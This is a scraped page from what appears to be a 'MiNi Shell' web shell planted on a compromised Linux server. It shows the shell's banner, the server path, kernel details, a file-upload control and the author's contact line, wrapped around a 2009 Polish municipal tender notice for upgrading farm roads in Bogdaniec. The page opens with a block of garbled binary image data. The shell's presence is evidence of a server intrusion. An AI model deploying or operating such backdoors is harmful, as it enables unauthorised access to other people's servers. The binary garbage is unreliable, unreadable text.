JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090526/167814-N-2009.html

<p class="kh_header"><b>Bogdaniec: Modernizacja dróg rolniczych w 2009r</b><br>
<b>Numer ogłoszenia: 167814 - 2009; data zamieszczenia: 26.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Bogdańcu , ul. Mickiewicza 45, 66-450 Bogdaniec, woj. lubuskie, tel. 095 7510210, faks 095 7510209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> infrastruktura@poczta.onet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja dróg rolniczych w 2009r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Modernizacja dróg rolniczych w tym: droga Kwiatkowice - Jeninek L=2500 mb, droga Włostów - Wał 1800 mb, droga Chwałowice - k. Kołoment L = 1289 mb, łącznie L = 5589 mb. Zakres zamówienia: - korytowanie 15 cm, szerokość 4-5 mb, podsypka piaskowa 3 cm, wykonanie warstwy dolnej z gruzobetonu sortowanego - 10 cm, wykonanie warstwy górnej 2 cm - tłuczeń (kliniec)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 10. Wadium

10.1.	Zamawiający żąda od wykonawców wniesienia wadium w kwocie 9000,00 PLN słownie dziewięć tysiący PLN.

10.3.	Wadium wnosi się przed upływem terminu składania ofert.

10.4.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, ze zm.).

10.5.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Gospodarczy Bank Spółdzielczy w Barlinku, Oddział w Bogdańcu numer rachunku bankowego: 30 8355 0009 0030 0621 2000 0004. 
            Wadium uważa się za wniesione, jeżeli kwota wadium znajdzie się na rachunku Zamawiającego najpóźniej w dniu poprzedzającym dzień otwarcia ofert.

10.6. 	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.

10.7. 	Zamawiający zwraca niezwłocznie wadium, jeżeli:
10.7.1.	upłynął termin związania ofertą;
10.7.2.	zawarto umowę w sprawie zamówienia publicznego i wniesiono   
                         zabezpieczenie należytego wykonania tej umowy;
10.7.3.	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty    
                         zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

10.8. 	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
10.8.1.	który wycofał ofertę przed upływem terminu składania ofert;
10.8.2.	który został wykluczony z postępowania;
10.8.3.	którego oferta została odrzucona.

10.9. 	Złożenie przez wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez wykonawcę prawa do wniesienia protestu.

10.10. 	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

10.11.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w pkt 7.3.1 nie złożył dokumentów lub oświadczeń o których mowa w pkt 12.2  lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących  po jego stronie.

10.12. 	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
10.12.1     odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
            określonych w ofercie;
10.12.2      nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
10.12.3    zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
                leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 6. Warunki udziału w postępowaniu
6.1. Warunki Formalne 

6.1.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy zgodnie z art.22 ust. 1 Ustawy posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

6.1.2. O udzielenie zamówienia nie mogą ubiegać się wykonawcy, którzy podlegają wykluczeniu z postępowania w myśl art. 24 Ustawy. 
6.2. Warunki ekonomiczne i techniczne

W postępowaniu mogą brać udział Wykonawcy, którzy posiadają niezbędną wiedzę 
i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia, oraz znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
6.2.1 Potencjał ekonomiczny i finansowy
Aby udokumentować, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca musi wykazać, że 

a)	zyskał w okresie ostatnich trzech lat średni roczny przychód w wysokości nie  mniejszej niż 500 tys. PLN, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie. W wypadku innych walut należy przyjąć przelicznik równy średniemu rocznemu kursowi PLN Europejskiego Banku Centralnego   w dniu 31 grudnia danego roku.

b)	posiada dostęp do linii kredytowej lub wolne środki w wysokości nie mniejszej niż 20% wartości robót określonej w ofercie.

W przypadku Wykonawców składających wspólną ofertę warunki ekonomiczno-finansowe powinny być spełnione łącznie przez wszystkich Wykonawców składających wspólną ofertę.
6.2.2 Sprzęt do wykonania robót

	Wykonawca przystępujący do wykonania robót  powinien wykazać się możliwością korzystania z następującego sprzętu:
- równiarek lub spycharek uniwersalnych z ukośnie ustawianym lemieszem; 
- walców statycznych, wibracyjnych lub płyt wibracyjnych.
- koparek przedsiębiernych,
- ciągnik z przyczepą,
- samochód ciężarowy wywrotka,
- sprzętu do zagęszczania gruntu,
- beczkowozów,

6.2.3  Doświadczenie Wykonawcy 
a)	Wykonawca musi wykazać, że w okresie ostatnich 5 lat, (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) ukończył z należytą starannością realizację co najmniej 2 zamówień, odpowiadających swoim rodzajem i zakresem rzeczowym niniejszemu zamówieniu, tj. budowę, modernizację dróg  o nawierzchni tłuczniowej nie mniejszej niż 10000 m2 każda.
 b)	Warunek wymieniony, w p.1 musi zostać spełniony łącznie przez wszystkich Wykonawców wspólnie ubiegających się o zamówienie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 12.2 Zawartość Oferty

12.2.1.  Wypełniony formularz ofertowy /pismem maszynowym, bez skreśleń,   
      (formularz nr 1)  wraz z wykazem załączników.

12.2.2.  Oświadczenie, że przedstawiona w ofercie cena jest kompletna i zapewnia
             realizację zamówienia zgodnie z przepisami prawa budowlanego,  
             dokumentacją techniczną oraz warunkami określonymi w niniejszej specyfikacji    
            (formularz  nr 2).

12.2.3. Oświadczenie, że Oferent zapoznał się ze Specyfikacją Istotnych Warunków 
             Zamówienia i przyjmuje ją bez zastrzeżeń ( formularz  nr 3 ).   

12.2.4. Oświadczenie, że w razie wygrania przetargu oferent  zobowiązuje się do 
             podpisania umowy w terminie 8 dni od dnia ogłoszenia rozstrzygnięcia 
             przetargu ( formularz  nr 4 ).

     12.2.5.  Oświadczenie, że nie podlega wykluczeniu z postępowania na podst. art.24 
            ust.1 ustawy Prawo Zamówień Publicznych ( formularz  nr 5).
   
12.2.6.  Oświadczenie wymagane zgodnie z art.22 ust.1 ustawy Prawo Zamówień 
             Publicznych ( formularz nr 6 ). 

12.2.7.  Oświadczenie o zabezpieczeniu wykonania przedmiotu umowy w wysokości  
             8 % wartości oferty (formularz nr 7).

     12.2.8.  Informacja o sytuacji finansowej oferenta na podstawie bilansu oraz 
            rachunków zysków i strat, a  w przypadku wykonawców nie zobowiązanych
            do sporządzania bilansu, informacji określających obroty, zysk oraz 
            zobowiązania i należności za  okres z ostatnich 3 lat obrotowych, a jeżeli 
            okres prowadzenia działalności jest krótszy- za ten okres (formularz nr 8).
                  Średnie roczne obroty z ostatnich trzech lat co najmniej 0,5 mln  złotych
                  oraz średni roczny zysk netto z ostatnich 3 lat nie może być wartością ujemną.

12.2.9. Dokumenty potwierdzające dysponowanie środkami finansowymi  ( na koncie 
             bankowym ) na realizację zamówienia o wartości 20% wartości robót 
            określonej w ofercie, wystawione przez bank obsługujący oferenta lub informacja 
            banku potwierdzająca  zdolność kredytową Oferenta. Dokumenty winny być 
            wystawione nie wcześniej niż  3 miesiące przed terminem składania ofert.

     12.2.10.Zaświadczenie z właściwego oddziału ZUS potwierdzające, że oferent nie       
            zalega  z opłacaniem składek lub uzyskał zgodę na zwolnienie, odroczenie lub 
            rozłożenie na raty zaległych płatności, wystawione nie wcześniej niż 3   
            miesiące przed terminem składania ofert.                                                                                     

  
  12.2.11. Zaświadczenie z właściwego Urzędu Skarbowego potwierdzające, że oferent 
                  nie zalega z opłacaniem podatków i opłat lub że uzyskał zgodę na zwolnienie, 
            odroczenie lub rozłożenie na raty zaległych płatności, wystawione nie  wcześniej      
            niż 3 miesiące przed terminem składania ofert.

    12.2.12. Aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji   
            działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed 
            upływem terminu składania ofert, a w przypadku wspólników spółki cywilnej 
            dodatkowo do oferty należy załączyć umowę spółki cywilnej.
            Profil działalności winien odpowiadać przedmiotowi zamówienia.

    12.2.13.  Wykaz osób uprawnionych do podpisywania dokumentów przetargowych                    
                   i podejmowania zobowiązań w imieniu oferenta ( formularz nr 9).

    12.2.14.  Informacja z Krajowego Rejestru Karnego, wydana nie wcześniej niż 6 
                 miesięcy przed wyznaczonym terminem składania ofert, że oferent /jeżeli jest 
                 osobą fizyczną/ nie był skazany prawomocnym wyrokiem za przestępstwa 
                 popełnione w związku z postępowaniem o udzielenie zamówienia publicznego,     
                 przestępstwo przekupstwa albo inne przestępstwa popełnione w  celu osiągnięcia      
                 korzyści majątkowych  lub gdy oferentem jest osoba prawna  urzędujący 
                 członkowie  władz nie zostali skazani prawomocnym wyrokiem  za  w/w 
                przestępstwa (zgodnie z art. 24 ust.1pkt.1-8 oraz art.24 ust.1 pkt 9 ustawy  PZP).

    12.2.15.  Wykaz zrealizowanych zamówień w ciągu ostatnich 5 lat o charakterze takim
           samym i złożoności porównywalnej z zakresem niniejszego zamówienia, z  
                 podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem  referencji    
                 potwierdzających, że  roboty te zostały wykonane z należytą  starannością    
                   ( formularz nr 10).
           Wykaz winien zawierać minimum 2 przedsięwzięcia z ostatnich 5 lat o tym 
           samym charakterze i stopniu trudności porównywalnym do robót  przetargowych 
           przy czym powierzchnia tłuczniowa  budowanej  lub modernizowanej drogi  nie 
           mniejsza niż 10.000 m2 każda.
    
    12.2.16.  Polisa lub inny dokument ubezpieczenia potwierdzający, że oferent jest 
                   ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej
             działalności gospodarczej.

     12.2.17. Oświadczenie o udzieleniu minimum 24 miesięcznej gwarancji na wykonany 
              przedmiot zamówienia ( formularz nr 11 ).
 
    12.2.18. Oświadczenie o akceptacji załączonego projektu umowy (formularz  nr12). 

    12.2.19.  Wykaz robót które będą zlecone podwykonawcom ( formularz nr 13 ).

    12.2.20.  Wykaz podstawowego sprzętu przewidzianego do wykonania zamówienia   
                    (formularz nr 14).

    12.2.21.  Zaświadczenie o nadaniu numeru REGON.

    12.2.22.  Zaświadczenie o nadaniu numeru NIP.

    12.2.23.   Dowód wniesienia wadium. W przypadku gwarancji ubezpieczeniowych lub 
                    bankowych należy dołączyć oryginał.

    12.2.24.  Wycenione załączone przedmiary robót (tom V).

     12.2.25. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP,    
                   zamiast dokumentów, o których mowa w p. 12.2.10, 12.2.11, 12.2.12, 12.2.14      
                   niniejszego rozdziału składa odpowiednie dokumenty wystawione zgodnie z    
                   prawem kraju, w którym ma siedzibę lub miejsce zamieszkania oraz ich    
                   tłumaczenia na język polski dokonane  przez tłumacza przysięgłego, 
                   potwierdzające że:
i.	Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności i nie otwarto jego likwidacji ani nie ogłoszono upadłości
ii.	nie orzeczono wobec niego zakazu ubiegania się o zamówienie
iii.	nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

12.2.26. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie     
              wydaje się dokumentów, o których mowa wyżej zastępuje się je dokumentem      
              zawierającym oświadczenie Wykonawcy potwierdzającym spełnienie powyższych     
              wymagań, złożonym przed notariuszem, właściwym organem sądowym,    
              administracyjnym albo organem samorządu zawodowego lub gospodarczego 
              kraju,  w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bogdaniec.biuletyn.net..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Bogdańcu ul. Mickiewicza 45, 66-450 Bogdaniec, p[ok. nr 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2009 godzina 09:00, miejsce: Urząd Gminy w Bogdańcu, sekretariat ul. Mickiewicza 45, 66-450 Bogdaniec.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 20 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com